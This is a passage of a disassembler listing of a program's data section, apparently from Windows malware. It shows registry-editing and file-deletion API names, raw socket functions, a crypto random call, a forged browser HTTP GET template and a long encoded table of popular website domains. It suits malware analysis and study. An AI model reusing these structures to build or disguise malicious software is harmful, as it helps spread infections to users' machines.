byte_9B93A0 db 35h, 2Eh, 0 ; DATA XREF: .text:009BA434�o
off_9B93A3 dd offset dword_9BA0C8 ; DATA XREF: sub_9ABC20+5�r
off_9B93A7 dd offset loc_9AF110 ; DATA XREF: sub_9B1A08-22B�r
off_9B93AB dd offset loc_9AB8E0 ; DATA XREF: sub_9ADAC4+413D�r
off_9B93AF dd offset loc_9AEDFC ; DATA XREF: sub_9ABA3C+4CA5�r
align 4
word_9B93B4 dw 5Ch ; DATA XREF: sub_9B611C:loc_9AB944�r
; sub_9B4CF4:loc_9AFEC0�r
align 4
aBind db 'bind',0 ; DATA XREF: .text:off_9B9738�o
align 10h
a1_ db '1.',0 ; DATA XREF: .text:off_9B90BC�o
; .text:009BA430�o
align 4
aComponents db 'Components',0 ; DATA XREF: .text:009BA1FC�o
align 10h
aWinsxs db 'winsxs',0 ; DATA XREF: .text:009BA334�o
off_9B93D7 dd offset aRegcreatekeyex ; DATA XREF: sub_9B0930:loc_9ACBE4�r
; "RegCreateKeyExA"
off_9B93DB dd offset dword_9BAEE0 ; DATA XREF: sub_9B0930+5�r
off_9B93DF dd offset loc_9AADB0 ; DATA XREF: sub_9AC6A0+87F1�r
align 4
aCursors db 'Cursors',0 ; DATA XREF: .text:009BA200�o
dword_9B93EC dd 0FFFFFFFFh, 9ADFF0h, 9AF9C0h, 626F6461h, 6F632E65h
; DATA XREF: sub_9B3FF8+5�o
; .text:009B9AA0�o
db 6Dh, 0
off_9B9402 dd offset loc_9AE8E0 ; DATA XREF: sub_9ABADC-B1D�r
align 4
aBoot_0 db 'Boot',0 ; DATA XREF: .text:009BA1E8�o
align 10h
aNew db 'New',0 ; DATA XREF: .text:009BA29C�o
off_9B9414 dd offset loc_9AE794 ; DATA XREF: sub_9B43F4-373�r
aGetmodulehandl db 'GetModuleHandleA',0 ; DATA XREF: .text:off_9BAFA7�o
off_9B9429 dd offset loc_9B3E00 ; DATA XREF: sub_9B0930+4C�r
off_9B942D dd offset loc_9B5188 ; DATA XREF: sub_9B04A8+11�r
align 4
aGetlasterror db 'GetLastError',0 ; DATA XREF: .text:off_9BA160�o
off_9B9441 dd offset loc_9AD224 ; DATA XREF: sub_9B04A8-2F6D�r
off_9B9445 dd offset aExitthread ; DATA XREF: sub_9B0930:loc_9AB0D8�r
; "ExitThread"
off_9B9449 dd offset loc_9B374C ; DATA XREF: sub_9B3EFC-6825�r
off_9B944D dd offset loc_9AC640 ; DATA XREF: sub_9B1F68+2927�r
align 4
dword_9B9454 dd 63696C63h, 726F736Bh, 6D6F632Eh ; DATA XREF: .text:009B9AF8�o
db 0
off_9B9461 dd offset loc_9B3F44 ; DATA XREF: sub_9AC6DC+9ACA�r
align 4
word_9B9468 dw 29h ; DATA XREF: sub_9B27D8:loc_9B0F40�r
off_9B946A dd offset dword_9B9904 ; DATA XREF: sub_9B6504+5�r
off_9B946E dd offset sub_9B4950 ; DATA XREF: sub_9B1584-2763�r
align 4
dword_9B9474 dd 2D72662Ch, 713B4143h, 352E303Dh ; DATA XREF: .text:009BA498�o
db 0
off_9B9481 dd offset dword_9BABD0 ; DATA XREF: sub_9B4950+5�r
off_9B9485 dd offset loc_9B32C4 ; DATA XREF: sub_9B4950-12D8�r
align 4
aExitthread db 'ExitThread',0 ; DATA XREF: .text:off_9B9445�o
align 4
dword_9B9498 dd 0FFFFFFFFh, 9AB760h, 9B3358h ; DATA XREF: .text:off_9BA5EC�o
aContentLength db 0Dh,0Ah ; DATA XREF: .text:off_9BA16C�o
db 'Content-Length: ',0
off_9B94B7 dd offset loc_9B0D78 ; DATA XREF: sub_9B3864-5020�r
off_9B94BB dd offset dword_9BADE0 ; DATA XREF: .text:009AFBBD�r
align 10h
aInter db 'Inter',0 ; DATA XREF: .text:009BA254�o
align 4
aAdsrevenue_net db 'adsrevenue.net',0 ; DATA XREF: .text:009B9AA4�o
off_9B94D7 dd offset dword_9BF3A0 ; DATA XREF: sub_9AD2B8+7�r
; sub_9ADCEC+34�r ...
off_9B94DB dd offset aNtohl ; DATA XREF: sub_9B0930:loc_9AD0A4�r
; "ntohl"
align 10h
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_9B0930:loc_9AE490�o
off_9B94F0 dd offset loc_9AF0B8 ; DATA XREF: sub_9B3408-65E4�r
off_9B94F4 dd offset loc_9AE444 ; DATA XREF: sub_9B3FF8-3D36�r
off_9B94F8 dd offset dword_9B9EB4 ; DATA XREF: sub_9B3A74+5�r
off_9B94FC dd offset aSoftwareMicros ; DATA XREF: sub_9AC170:loc_9B5A4C�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dword_9B9500 dd 6C69616Dh, 75722Eh, 53324Ch ; DATA XREF: .text:009B9BB0�o
; .text:009BA268�o
aDeletefilea db 'DeleteFileA',0 ; DATA XREF: .text:off_9BAB68�o
off_9B9518 dd offset loc_9B5454 ; DATA XREF: sub_9B4CF4-2019�r
aFiles_wordpres db 'files.wordpress.com',0 ; DATA XREF: .text:009B9B48�o
off_9B9530 dd offset aCryptacquireco ; DATA XREF: sub_9B0930:loc_9B1714�r
; "CryptAcquireContextA"
off_9B9534 dd offset loc_9B2C44 ; DATA XREF: sub_9AF704+2D�r
dword_9B9538 dd 64696162h, 6F632E75h, 6Dh, 796E6974h, 2E636970h, 6D6F63h
; DATA XREF: .text:009B9AE0�o
; .text:009B9C74�o
off_9B9550 dd offset loc_9AAE14 ; DATA XREF: sub_9B0930-2385�r
a3705 db '3705',0 ; DATA XREF: .text:009BA808�o
off_9B9559 dd offset loc_9B3110 ; DATA XREF: sub_9ADAC4-464�r
off_9B955D dd offset aFindnextfilea ; DATA XREF: sub_9B0930:loc_9B480C�r
; "FindNextFileA"
align 4
dword_9B9564 dd 302E36h ; DATA XREF: .text:009B9A7C�o
off_9B9568 dd offset loc_9ACED0 ; DATA XREF: sub_9B3864-475C�r
off_9B956C dd offset loc_9B4ABC ; DATA XREF: sub_9B4610-3B3C�r
aRecv db 'recv',0 ; DATA XREF: .text:off_9B9346�o
off_9B9575 dd offset loc_9B28F0 ; DATA XREF: sub_9AFB1C+62AF�r
off_9B9579 dd offset loc_9ADFF4 ; DATA XREF: sub_9AEE5C+A�r
align 10h
dword_9B9580 dd 0FFFFFFFFh, 9AE354h, 9AC138h ; DATA XREF: .text:off_9BAFDF�o
dword_9B958C dd 0FFFFFFFFh, 9B4A78h, 9B4CD0h ; DATA XREF: .text:off_9B9020�o
off_9B9598 dd offset loc_9AB474 ; DATA XREF: sub_9AF25C+33CE�r
dword_9B959C dd 0FFFFFFFFh, 9B257Ch, 9AFE6Ch, 0FFFFFFFFh, 9B2CACh, 9B11E8h
; DATA XREF: .text:off_9B8FD0�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE ',0 ; DATA XREF: .text:off_9B89EF�o
off_9B95D3 dd offset loc_9B1278 ; DATA XREF: sub_9B63D8-99B9�r
align 4
dword_9B95D8 dd 0FFFFFFFFh, 9ABD5Ch, 9B0348h, 79616265h, 74692Eh, 65746E49h
; DATA XREF: .text:off_9BACA4�o
; .text:009B9B34�o
dd 74656E72h, 0
aMicrosoft_0 db 'Microsoft',0 ; DATA XREF: .text:009BA280�o
align 4
dword_9B9604 dd 88804427h ; DATA XREF: sub_9B3EFC+18�r
dd 644B0h, 0
dd 80003FF0h, 0
dd 83FF8000h, 80000020h, 0FFFFFFFFh
off_9B9624 dd offset loc_9B0B64 ; DATA XREF: sub_9B0930+1A61�r
aNtohl db 'ntohl',0 ; DATA XREF: .text:off_9B94DB�o
off_9B962E dd offset loc_9AC93C ; DATA XREF: sub_9B161C+DD�r
off_9B9632 dd offset dword_9BCB9C ; DATA XREF: sub_9B022C+B�r
; sub_9B0FD0+31�r ...
align 4
dword_9B9638 dd 67676964h, 6D6F632Eh ; DATA XREF: .text:009B9B18�o
db 0
off_9B9641 dd offset loc_9B4590 ; DATA XREF: sub_9B2830+2324�r
off_9B9645 dd offset dword_9BA70C ; DATA XREF: sub_9B63D8-99C9�r
align 4
dword_9B964C dd 6B6E696Ch, 6B637562h, 6F632E73h ; DATA XREF: .text:009B9B98�o
db 6Dh, 0
off_9B965A dd offset aRegopenkeyexa ; DATA XREF: sub_9B0930:loc_9AE35C�r
; "RegOpenKeyExA"
align 10h
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: .text:off_9B9072�o
align 10h
off_9B9670 dd offset dword_9BA8F8 ; DATA XREF: sub_9B63D8-145B�r
dd offset dword_9BA8F8
dd offset aApplicationX_0 ; ", application/x-ms-application"
dword_9B967C dd 62646D69h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9B88�o
aMemmove db 'memmove',0 ; DATA XREF: .text:off_9B8E7D�o
aTagged_com db 'tagged.com',0 ; DATA XREF: .text:009B9C60�o
off_9B969B dd offset aAdvapi32 ; DATA XREF: sub_9B0930-40EF�r
; "ADVAPI32"
off_9B969F dd offset loc_9B0544 ; DATA XREF: sub_9B0930+5796�r
off_9B96A3 dd offset loc_9AE298 ; DATA XREF: sub_9B649C-2343�r
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: .text:off_9B9A6A�o
off_9B96B7 dd offset loc_9B1BC0 ; DATA XREF: sub_9B0930-4813�r
off_9B96BB dd offset dword_9B8890 ; DATA XREF: sub_9ABF08+5�r
align 10h
dword_9B96C0 dd 2E61626Eh, 6D6F63h ; DATA XREF: .text:009B9BF4�o
off_9B96C8 dd offset loc_9B5D7C ; DATA XREF: sub_9B3864-5E63�r
dword_9B96CC dd 2E6E736Dh, 6D6F63h ; DATA XREF: .text:009B9BDC�o
off_9B96D4 dd offset loc_9B323C ; DATA XREF: sub_9B1B20-D5F�r
off_9B96D8 dd offset loc_9AD1F8 ; DATA XREF: sub_9AD11C+2967�r
off_9B96DC dd offset dword_9BA9D8 ; DATA XREF: sub_9AEAAC+5�r
off_9B96E0 dd offset sub_9B611C ; DATA XREF: sub_9B6078-613�r
off_9B96E4 dd offset loc_9AEA14 ; DATA XREF: sub_9ACEE8+2682�r
off_9B96E8 dd offset loc_9AF430 ; DATA XREF: sub_9B3864-2ADD�r
off_9B96EC dd offset loc_9B2DA0 ; DATA XREF: sub_9ADAC4-21C8�r
off_9B96F0 dd offset loc_9B4124 ; DATA XREF: sub_9AC32C+F6E�r
aFindfirstfilea db 'FindFirstFileA',0 ; DATA XREF: .text:off_9BAD70�o
off_9B9703 dd offset loc_9B41F0 ; DATA XREF: sub_9B0734+1E�r
off_9B9707 dd offset loc_9AE0FC ; DATA XREF: sub_9B0930-1637�r
off_9B970B dd offset loc_9B1BF8 ; DATA XREF: sub_9ADAC4+73FC�r
off_9B970F dd offset loc_9B0B14 ; DATA XREF: sub_9B18F8+1F�r
off_9B9713 dd offset loc_9B3754 ; DATA XREF: sub_9B3408-7CB0�r
off_9B9717 dd offset aConnect ; DATA XREF: sub_9B0930:loc_9ADEAC�r
; "connect"
off_9B971B dd offset dword_9BAE70 ; DATA XREF: sub_9B1D80+5�r
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: .text:off_9B99B9�o
off_9B9730 dd offset aSetfileattribu ; DATA XREF: sub_9B0930:loc_9AB974�r
; "SetFileAttributesA"
dword_9B9734 dd 666E69h ; DATA XREF: .text:009BA248�o
off_9B9738 dd offset aBind ; DATA XREF: sub_9B0930:loc_9B245C�r
; "bind"
dword_9B973C dd 676F6C62h, 632E6166h ; DATA XREF: .text:009B9AF4�o
db 6Fh, 6Dh, 0
off_9B9747 dd offset aSend ; DATA XREF: sub_9B0930:loc_9AE150�r
; "send"
off_9B974B dd offset loc_9ADBB0 ; DATA XREF: sub_9B3EFC+25�r
off_9B974F dd offset loc_9B3B8C ; DATA XREF: sub_9AC6DC+4D�r
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: .text:off_9BAD5D�o
off_9B975D dd offset loc_9AFF18 ; DATA XREF: sub_9B5904-1569�r
align 4
dword_9B9764 dd 6576696Ch, 726F6F64h, 6D6F632Eh ; DATA XREF: .text:009B9BA4�o
db 0
off_9B9771 dd offset dword_9BAF40 ; DATA XREF: sub_9B4480+5�r
off_9B9775 dd offset loc_9B5690 ; DATA XREF: sub_9B03E8+3596�r
off_9B9779 dd offset dword_9B8FB8 ; DATA XREF: sub_9B6264+5�r
off_9B977D dd offset aSocket ; DATA XREF: sub_9B0930:loc_9B2068�r
; "socket"
off_9B9781 dd offset loc_9AD4D0 ; DATA XREF: sub_9B6504-5B7�r
off_9B9785 dd offset loc_9ADB90 ; DATA XREF: sub_9B1A08-5674�r
align 4
aKernel db 'Kernel',0 ; DATA XREF: .text:009BA264�o
off_9B9793 dd offset loc_9AE674 ; DATA XREF: sub_9B3FF8+3E�r
off_9B9797 dd offset loc_9B5D88 ; DATA XREF: sub_9ABD30+21DC�r
off_9B979B dd offset aGetversion ; DATA XREF: sub_9B0930:loc_9AC4B0�r
; "GetVersion"
off_9B979F dd offset loc_9B60D4 ; DATA XREF: sub_9B1334+8�r
align 4
dword_9B97A4 dd 0FFFFFFFFh, 9B45E0h, 9B02C8h, 6B636150h, 73656761h
; DATA XREF: .text:off_9B91AE�o
; .text:009BA2AC�o
db 0
off_9B97B9 dd offset loc_9B143C ; DATA XREF: sub_9AB1A0+2B22�r
off_9B97BD dd offset dword_9BA954 ; DATA XREF: sub_9B649C+5�r
off_9B97C1 dd offset aGetwindowsdire ; DATA XREF: sub_9B0930:loc_9AF6D0�r
; "GetWindowsDirectoryA"
off_9B97C5 dd offset sub_9B19D8 ; DATA XREF: sub_9ACA48+93BB�r
align 4
dword_9B97CC dd 6B6E696Ch, 6E696465h, 6D6F632Eh ; DATA XREF: .text:009B9B9C�o
db 0
off_9B97D9 dd offset loc_9AD968 ; DATA XREF: sub_9B0930+2469�r
off_9B97DD dd offset dword_9BBE58 ; DATA XREF: sub_9AB11C+18�r
; sub_9B27D8-749C�r ...
off_9B97E1 dd offset loc_9B59F0 ; DATA XREF: sub_9B1A08-4576�r
off_9B97E5 dd offset aSelect ; DATA XREF: sub_9B0930:loc_9B0984�r
; "select"
align 4
dword_9B97EC dd 7869616Bh, 30306E69h, 6F632E31h ; DATA XREF: .text:009B9B90�o
db 6Dh, 0
off_9B97FA dd offset loc_9B182C ; DATA XREF: sub_9AC6DC+35AE�r
align 10h
aVerqueryvaluea db 'VerQueryValueA',0 ; DATA XREF: .text:off_9B8949�o
off_9B980F dd offset loc_9ABB88 ; DATA XREF: sub_9B0930-49A5�r
align 4
aCryptgenrandom db 'CryptGenRandom',0 ; DATA XREF: .text:off_9BA7FE�o
off_9B9823 dd offset loc_9ACFE0 ; DATA XREF: sub_9B63D8-3992�r
off_9B9827 dd offset aGetpeername ; DATA XREF: sub_9B0930:loc_9B5780�r
; "getpeername"
off_9B982B dd offset loc_9AE3C4 ; DATA XREF: sub_9B1584-274B�r
align 10h
a04506 db '04506',0 ; DATA XREF: .text:009BA814�o
align 4
aPla db 'PLA',0 ; DATA XREF: .text:009BA2C0�o
off_9B983C dd offset aSetevent ; DATA XREF: sub_9B0930:loc_9B23C0�r
; "SetEvent"
off_9B9840 dd offset loc_9B2DEC ; DATA XREF: sub_9B63D8-7BA5�r
off_9B9844 dd offset dword_9BBE3C ; DATA XREF: sub_9AF25C-2D5E�r
; sub_9AEC20:loc_9AC8A8�r ...
off_9B9848 dd offset aHtonl ; DATA XREF: sub_9B0930:loc_9B3E44�r
; "htonl"
off_9B984C dd offset dword_9BA37C ; DATA XREF: sub_9ACEE8+5�r
dword_9B9850 dd 0FFFFFFFFh, 9B1958h, 9B62D4h ; DATA XREF: .text:off_9B992A�o
off_9B985C dd offset dword_9BCBCC ; DATA XREF: sub_9B3B1C:loc_9AC0C4�r
; sub_9B3B1C-7A44�r ...
off_9B9860 dd offset loc_9B43A4 ; DATA XREF: .text:009B11AD�r
off_9B9864 dd offset loc_9AF228 ; DATA XREF: sub_9B4610-1030�r
off_9B9868 dd offset sub_9B082C ; DATA XREF: sub_9B27D8-5110�r
dword_9B986C dd 65666572h, 636E6572h, 6F632E65h ; DATA XREF: .text:009B9C3C�o
db 6Dh, 0
off_9B987A dd offset loc_9B5DA0 ; DATA XREF: sub_9B174C+285A�r
align 10h
aApplicationXam db ', application/xaml+xml',0 ; DATA XREF: .text:009B99D8�o
off_9B9897 dd offset loc_9B574C ; DATA XREF: sub_9B0930+55AA�r
off_9B989B dd offset dword_9BCBB4 ; DATA XREF: sub_9AD01C+45�r
; sub_9B3B1C+40�r
off_9B989F dd offset loc_9AFB08 ; DATA XREF: sub_9B4FD0-4529�r
off_9B98A3 dd offset loc_9ADEE0 ; DATA XREF: sub_9B3864+2C32�r
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: .text:off_9B92FC�o
align 4
aMegaporn_com db 'megaporn.com',0 ; DATA XREF: .text:009B9BC0�o
off_9B98C1 dd offset dword_9BCB90 ; DATA XREF: .text:009B0608�r
; sub_9B1584+3B�r
align 4
dword_9B98C8 dd 61440A0Dh, 203A6574h ; DATA XREF: .text:off_9B8DB6�o
db 0
off_9B98D1 dd offset aSystemtimetofi ; DATA XREF: sub_9B0930:loc_9AF44C�r
; "SystemTimeToFileTime"
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: .text:off_9B8E81�o
off_9B98E6 dd offset aKernel32 ; DATA XREF: sub_9B0930+32�r
; "KERNEL32"
off_9B98EA dd offset loc_9B2D74 ; DATA XREF: sub_9B1D80+292E�r
align 10h
aReadfile db 'ReadFile',0 ; DATA XREF: .text:off_9B907A�o
align 4
aDigital db 'Digital',0 ; DATA XREF: .text:009BA210�o
dword_9B9904 dd 0FFFFFFFFh, 9AC124h, 9B1C90h ; DATA XREF: .text:off_9B946A�o
off_9B9910 dd offset aNtohs ; DATA XREF: sub_9B0930:loc_9AE0FC�r
; "ntohs"
dword_9B9914 dd 72726F74h, 7A746E65h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9C78�o
aHtons db 'htons',0 ; DATA XREF: .text:off_9BA850�o
off_9B992A dd offset dword_9B9850 ; DATA XREF: sub_9B3408+5�r
align 10h
aFonts db 'Fonts',0 ; DATA XREF: .text:009BA22C�o
off_9B9936 dd offset aHttp1_0 ; DATA XREF: sub_9B63D8-E04�r
; "HTTP/1.0 "
align 4
dword_9B993C dd 6E61726Fh, 662E6567h ; DATA XREF: .text:009B9C0C�o
db 72h, 0
off_9B9946 dd offset loc_9AC814 ; DATA XREF: sub_9B0930+37A3�r
align 4
dword_9B994C dd 5653203Bh ; DATA XREF: sub_9B082C:loc_9AB318�r
word_9B9950 dw 31h ; DATA XREF: sub_9B082C-550B�r
align 4
dword_9B9954 dd 636F6567h, 65697469h, 6F632E73h, 6Dh ; DATA XREF: .text:009B9B5C�o
dword_9B9964 dd 0FFFFFFFFh, 9B11E0h, 9AC9D4h ; DATA XREF: .text:off_9BAD8E�o
off_9B9970 dd offset loc_9AECC4 ; DATA XREF: sub_9B4FD0-7CA0�r
off_9B9974 dd offset loc_9AC04C ; DATA XREF: sub_9B0930+4E7C�r
off_9B9978 dd offset loc_9AFE14 ; DATA XREF: sub_9B4950+12F0�r
off_9B997C dd offset loc_9B24E0 ; DATA XREF: sub_9AB3B0+8873�r
dword_9B9980 dd 6F706370h, 6F632E70h ; DATA XREF: .text:009B9C1C�o
db 6Dh, 0
off_9B998A dd offset aMsvcrt ; DATA XREF: sub_9B0930-40C8�r
; "MSVCRT"
off_9B998E dd offset loc_9ADF00 ; DATA XREF: sub_9ABD30+188F�r
align 4
dword_9B9994 dd 0FFFFFFFFh, 9AD6FCh, 9AFB80h, 65737341h, 696C626Dh
; DATA XREF: .text:off_9BAF12�o
; .text:009BA1E0�o
db 65h, 73h, 0
off_9B99AB dd offset dword_9B92B0 ; DATA XREF: sub_9AC6DC+5�r
off_9B99AF dd offset loc_9AC0C4 ; DATA XREF: sub_9B3B1C-2741�r
align 4
aLogs db 'Logs',0 ; DATA XREF: .text:009BA270�o
off_9B99B9 dd offset aWsagetlasterro ; DATA XREF: sub_9B0930:loc_9B3E90�r
; "WSAGetLastError"
off_9B99BD dd offset dword_9BAB9C ; DATA XREF: sub_9B4FD0+5�r
align 4
dword_9B99C4 dd 0FFFFFFFFh, 9B5138h, 9B1C10h ; DATA XREF: .text:off_9B90D9�o
off_9B99D0 dd offset dword_9BA8F8 ; DATA XREF: sub_9B63D8-1487�r
dd offset dword_9BA8F8
dd offset aApplicationXam ; ", application/xaml+xml"
off_9B99DC dd offset loc_9B4AFC ; DATA XREF: sub_9AB1A0+AAD7�r
off_9B99E0 dd offset dword_9BA34C ; DATA XREF: sub_9B1584+5�r
aPhoto db 'Photo',0 ; DATA XREF: .text:009BA2BC�o
off_9B99EA dd offset loc_9B13C0 ; DATA XREF: sub_9B3B1C+F2B�r
off_9B99EE dd offset loc_9B51E4 ; DATA XREF: sub_9AD97C+28A8�r
off_9B99F2 dd offset loc_9B4C68 ; DATA XREF: sub_9B1A08-3C82�r
off_9B99F6 dd offset loc_9AF098 ; DATA XREF: sub_9B2E04+337E�r
off_9B99FA dd offset loc_9AD9E4 ; DATA XREF: sub_9B0930-5B10�r
align 10h
dword_9B9A00 dd 0FFFFFFFFh, 9ACFF4h, 9ABDE0h ; DATA XREF: .text:off_9BAA20�o
off_9B9A0C dd offset loc_9AFE8C ; DATA XREF: sub_9B0930-193D�r
dword_9B9A10 dd 70796170h, 7075706Fh, 6D6F632Eh ; DATA XREF: .text:009B9C14�o
db 0
off_9B9A1D dd offset loc_9ABE44 ; DATA XREF: sub_9AF25C+1900�r
off_9B9A21 dd offset loc_9B24A4 ; DATA XREF: sub_9B174C+3DD6�r
off_9B9A25 dd offset dword_9B9E38 ; DATA XREF: sub_9B6078+5�r
off_9B9A29 dd offset loc_9B4A64 ; DATA XREF: sub_9B1F68+2159�r
align 10h
dword_9B9A30 dd 2E326366h, 6D6F63h, 74726170h, 6B6F7079h, 632E7265h
; DATA XREF: .text:009B9B44�o
; .text:009B9C10�o
dd 6D6Fh, 2E6B7361h, 6D6F63h
off_9B9A50 dd offset loc_9ACCC8 ; DATA XREF: sub_9ABF08+4CB0�r
dword_9B9A54 dd 654D203Bh ; DATA XREF: sub_9ADB10:loc_9B0170�r
dword_9B9A58 dd 20616964h ; DATA XREF: sub_9ADB10+2668�r
dword_9B9A5C dd 746E6543h ; DATA XREF: sub_9ADB10+2670�r
dword_9B9A60 dd 50207265h ; DATA XREF: sub_9ADB10+267A�r
dword_9B9A64 dd 2E352043h ; DATA XREF: sub_9ADB10+2684�r
word_9B9A68 dw 30h ; DATA XREF: sub_9ADB10+268C�r
off_9B9A6A dd offset aRegsetvalueexa ; DATA XREF: sub_9B0930:loc_9B1CE8�r
; "RegSetValueExA"
align 10h
off_9B9A70 dd offset dword_9BAACC ; DATA XREF: sub_9AB3B0+4F�r
dd offset dword_9B9E48
dd offset dword_9BABDC
dd offset dword_9B9564
dd offset dword_9BAF04
dword_9B9A84 dd 3420544Eh ; DATA XREF: .text:009BAD34�o
db 2Eh, 30h, 0
off_9B9A8B dd offset loc_9ADC78 ; DATA XREF: sub_9B63D8-7C0C�r
off_9B9A8F dd offset aWs2_32 ; DATA XREF: sub_9B0930-40DC�r
; "WS2_32"
align 4
off_9B9A94 dd offset a2ch_net ; DATA XREF: sub_9ACEE8+2651�r
; "2ch.net"
dd offset a4shared_com ; "4shared.com"
dd offset dword_9BA438
dd offset dword_9B93EC+0Ch
dd offset aAdsrevenue_net ; "adsrevenue.net"
dd offset aAdultadworld_c ; "adultadworld.com"
dd offset aAdultfriendfin ; "adultfriendfinder.com"
dd offset dword_9B9F40
dd offset dword_9BAE7C
dd offset dword_9B88AC
dd offset dword_9BA604
dd offset dword_9BA9B4
dd offset dword_9B9EA4
dd offset dword_9BAA54
dd offset dword_9B9A30+18h
dd offset dword_9B9E7C
dd offset aAwempire_com ; "awempire.com"
dd offset aBadongo_com ; "badongo.com"
dd offset dword_9BA728
dd offset dword_9B9538
dd offset dword_9BAD14
dd offset dword_9BAEEC
dd offset dword_9B8F00
dd offset dword_9B90C8
dd offset dword_9B973C
dd offset dword_9B9454
dd offset dword_9B8D30
dd offset dword_9B8C8C+0Ch
dd offset dword_9BAD74
dd offset dword_9BADD0
dd offset dword_9BAA60
dd offset dword_9B9128
dd offset aDepositfiles_c ; "depositfiles.com"
dd offset dword_9B9638
dd offset aDisney_go_com ; "disney.go.com"
dd offset aDoubleclick_co ; "doubleclick.com"
dd offset aDownload_com ; "download.com"
dd offset dword_9BAA74
dd offset dword_9B8920+18h
dd offset dword_9BAD98
dd offset dword_9B95D8+0Ch
dd offset dword_9B9EC8
dd offset dword_9B8D58
dd offset aFastclick_com ; "fastclick.com"
dd offset dword_9B9A30
dd offset aFiles_wordpres ; "files.wordpress.com"
dd offset dword_9BA8E4
dd offset dword_9BACF0
dd offset dword_9B8FD4
dd offset dword_9BA628
dd offset dword_9B9954
dd offset dword_9B89E8
dd offset dword_9B9E54
dd offset dword_9BA6D0
dd offset aGooglesyndicat ; "googlesyndication.com"
dd offset dword_9BA12C
dd offset dword_9B88D4
dd offset dword_9B934C
dd offset dword_9BAB74
dd offset dword_9BA11C
dd offset dword_9BA6F0
dd offset dword_9B967C
dd offset dword_9BA3A8
dd offset dword_9B97EC
dd offset dword_9BAFD4
dd offset dword_9B964C
dd offset dword_9B97CC
dd offset dword_9BAE2C
dd offset dword_9B9764
dd offset dword_9BA78C
dd offset aLivejournal_co ; "livejournal.com"
dd offset dword_9B9500
dd offset dword_9BA944
dd offset dword_9BA184
dd offset dword_9B9F50
dd offset aMegaporn_com ; "megaporn.com"
dd offset dword_9BAFAC
dd offset dword_9B9F88
dd offset dword_9B9F28
dd offset dword_9B8D18
dd offset dword_9B8D48
dd offset dword_9B91B8+8
dd offset dword_9B96CC
dd offset dword_9BA7D4
dd offset dword_9B89A8
dd offset aMywebsearch_co ; "mywebsearch.com"
dd offset dword_9B9304+0Ch
dd offset dword_9B92A0
dd offset dword_9B96C0
dd offset dword_9B9FC4
dd offset dword_9B87B4
dd offset aNicovideo_jp ; "nicovideo.jp"
dd offset aNing_com ; "ning.com"
dd offset dword_9B8974+4
dd offset dword_9B993C
dd offset dword_9B9A30+8
dd offset dword_9B9A10
dd offset aPconline_com_c ; "pconline.com.cn"
dd offset dword_9B9980
dd offset dword_9BA414
dd offset aPhotobucket_co ; "photobucket.com"
dd offset dword_9BAA44
dd offset dword_9BA174
dd offset dword_9B8FA0
dd offset aRapidshare_c_0 ; "rapidshare.com"
dd offset aRediff_com ; "rediff.com"
dd offset dword_9B986C
dd offset dword_9BACC0
dd offset dword_9B9EFC
dd offset dword_9B8920+0Ch
dd offset dword_9B8EA8
dd offset aSonico_com ; "sonico.com"
dd offset dword_9BA470
dd offset aSourceforge_ne ; "sourceforge.net"
dd offset aStudiverzeichn ; "studiverzeichnis.com"
dd offset aTagged_com ; "tagged.com"
dd offset dword_9BA71C
dd offset dword_9B9088
dd offset aThepiratebay_o ; "thepiratebay.org"
dd offset aTianya_cn ; "tianya.cn"
dd offset dword_9B9538+0Ch
dd offset dword_9B9914
dd offset aTribalfusion_c ; "tribalfusion.com"
dd offset dword_9B9284
dd offset dword_9BACAC
dd offset dword_9BA6E4
dd offset dword_9BA1BC
dd offset dword_9BA844
dd offset dword_9BAC1C
dd offset dword_9BAF78
dd offset aVkontakte_ru ; "vkontakte.ru"
dd offset dword_9BAD80
dd offset dword_9B8CC8
dd offset dword_9BAB44
dd offset dword_9BAB08
dd offset dword_9B9284+0Ch
dd offset dword_9B9378
dd offset aXnxx_com ; "xnxx.com"
dd offset dword_9BAE48
dd offset aYahoo_co_jp ; "yahoo.co.jp"
dd offset dword_9B8C24
dd offset dword_9B87E0+0Ch
dd offset aYouporn_com ; "youporn.com"
dd offset dword_9B9214
dd offset dword_9B87FC
dd offset dword_9B9158
dd offset aZshare_net ; "zshare.net"
dword_9B9CE0 dd 0FFFFFFFFh, 9B6500h, 9B1CBCh ; DATA XREF: .text:off_9B8DD8�o
off_9B9CEC dd offset loc_9B273C ; DATA XREF: sub_9B2E04+2250�r
aOffice db 'Office',0 ; DATA XREF: .text:009BA2A0�o
off_9B9CF7 dd offset loc_9B3A04 ; DATA XREF: sub_9B4950-6DA6�r
align 4
aVersion db 'VERSION',0 ; DATA XREF: sub_9B0930-40B5�o
off_9B9D04 dd offset loc_9B5124 ; DATA XREF: sub_9B649C-81F7�r
aMsdownld db 'msdownld',0 ; DATA XREF: .text:009BA294�o
align 4
aGooglesyndicat db 'googlesyndication.com',0 ; DATA XREF: .text:009B9B6C�o
align 4
; char aGetSHttp1_1Acc[]
aGetSHttp1_1Acc db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B63D8-144B�o
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg%s%s%s'
db '%s%s, */*',0Dh,0Ah
db 'Accept-Language: %s%s',0Dh,0Ah
db '%sAccept-Encoding: gzip, deflate',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
off_9B9DF7 dd offset loc_9AF938 ; DATA XREF: sub_9B1584+91�r
align 4
aCryptreleaseco db 'CryptReleaseContext',0 ; DATA XREF: .text:off_9BABB0�o
aBadongo_com db 'badongo.com',0 ; DATA XREF: .text:009B9AD8�o
dword_9B9E1C dd 0FFFFFFFFh, 9B61F8h, 9B5418h ; DATA XREF: .text:off_9BA69C�o
off_9B9E28 dd offset loc_9AC804 ; DATA XREF: sub_9B3A74-8BB4�r
